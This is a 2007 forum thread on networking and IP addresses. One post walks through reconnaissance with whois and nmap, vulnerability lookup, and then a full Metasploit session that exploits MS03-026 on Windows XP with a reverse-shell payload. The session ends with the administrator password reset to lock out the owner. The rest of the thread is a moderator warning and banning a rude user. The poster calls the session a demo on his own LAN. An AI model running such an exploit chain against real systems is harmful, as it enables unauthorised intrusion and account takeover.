Go Back   Computer Forums > General Computing > Networking | DNS
Click Here to Login
Join Computer forums Today


Reply
 
Thread Tools Search this Thread Display Modes
 
Old 04-24-2007, 10:09 AM   #11
BSOD
 
0x0161's Avatar
 
Join Date: Apr 2007
Posts: 441
Default Re: ip addresses

Quote:
yea i was jwing im cocasion and european so if they want to mess

with me they'll hav to fuck with the whole US. but jwing because people can

easily find out other peeps ip address so i was like thats fucked up if

they can do all this shit

If they have your IP address they can identify the 'target' host(s). How?

(a lots of different ways)one way to do A simple whois query from

http://ws.arin.net/whois can give them this information.


Once they have this information, they can easily fire up their favorite

port scanner nmap, for example, and scan your system to find open ports.

Why are they looking to find open ports?

Because open ports means the system is listening for incomming

connections.


Identify applications,servers, and so on that are running on your system

(based on the open ports they found) again, nmap can do this.


Next, find exploits specific to those applications and servers (if any) on

your system.

Nessus and GFI both free can do this. Metasploit has a nice selection of

exploits. Sites such as;

http://nvd.nist.gov/

http://www.securityfocus.com/

can assist as well.

Next, step Exploit the system.

Metaploit can easily do this.

Quote:
[*] Starting the Metasploit Framework...



__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


+ -- --=[ msfconsole v2.7 [158 exploits - 76 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf msrpc_dcom_ms03_026(win32_reverse) > set RPORT 135
RPORT -> 135
msf msrpc_dcom_ms03_026(win32_reverse) > set LHOST 192.168.1.100
LHOST -> 192.168.1.100
msf msrpc_dcom_ms03_026(win32_reverse) > set LPORT 4321
LPORT -> 4321
msf msrpc_dcom_ms03_026(win32_reverse) > exploit[*] Starting Reverse Handler.[*] Sending request...[*] Got connection from 192.168.1.100:4321 <-> 192.168.1.101:3054

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net users administrator *
Type a password for the user:
Retype the password to confirm:
The command completed successfully.



C:\WINDOWS\system32>Caught interrupt, exit connection? [y/n] y[*] Exiting Reverse Handler.
msf msrpc_dcom_ms03_026(win32_reverse) >
Box is now owned, and changed the Admin password for later entry into the system and to block out the real admin. This is a little demo on a PC ON my network.
__________________

0x0161 is offline   Reply With Quote
Old 04-24-2007, 01:48 PM   #12
Golden Master
 
Brookfield's Avatar
 
Join Date: Apr 2005
Posts: 10,056
Default Re: ip addresses

Quote:
Originally Posted by pyroknife View Post
yea i was jwing im cocasion and european so if they want to mess with me they'll hav to<<DELETED>> with the whole US. but jwing because people can easily find out other peeps ip address so i was like thats<<DELETED>> up if they can do all this shit
I don't like your attitude, & now I've had to delete offensive words, you only joined today, & if you continue in this vein I will ban you, & that's a promise.
__________________

Brookfield is offline   Reply With Quote
Old 04-24-2007, 03:02 PM   #13
BSOD
 
Join Date: Apr 2007
Posts: 6
Default Re: ip addresses

go ahead i could care lessless:
if u dont allow people to cuss then its F**ked up so grow up
pyroknife is offline   Reply With Quote
Old 04-24-2007, 03:22 PM   #14
Golden Master
 
Brookfield's Avatar
 
Join Date: Apr 2005
Posts: 10,056
Default Re: ip addresses

Quote:
Originally Posted by pyroknife View Post
go ahead i could care lessless:
if u dont allow people to cuss then its F**ked up so grow up
Certainly, anything to oblige, you're PB'd
Brookfield is offline   Reply With Quote
Old 04-24-2007, 05:01 PM   #15
BSOD
 
0x0161's Avatar
 
Join Date: Apr 2007
Posts: 441
Default Re: ip addresses

He will just create a new account and be back. Did you block his IP address or the entire net-range?

Cheers, 0x0161
0x0161 is offline   Reply With Quote
Old 04-24-2007, 05:08 PM   #16
Golden Master
 
Brookfield's Avatar
 
Join Date: Apr 2005
Posts: 10,056
Default Re: ip addresses

Quote:
Originally Posted by 0x0161 View Post
He will just create a new account and be back. Did you block his IP address or the entire net-range?

Cheers, 0x0161
I'm not able to do that, only admin.
__________________

Brookfield is offline   Reply With Quote
Reply

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off



All times are GMT -5. The time now is 07:04 PM.


Powered by vBulletin® Version 3.8.8 Beta 4
Copyright ©2000 - 2017, vBulletin Solutions, Inc.
Search Engine Friendly URLs by vBSEO 3.6.0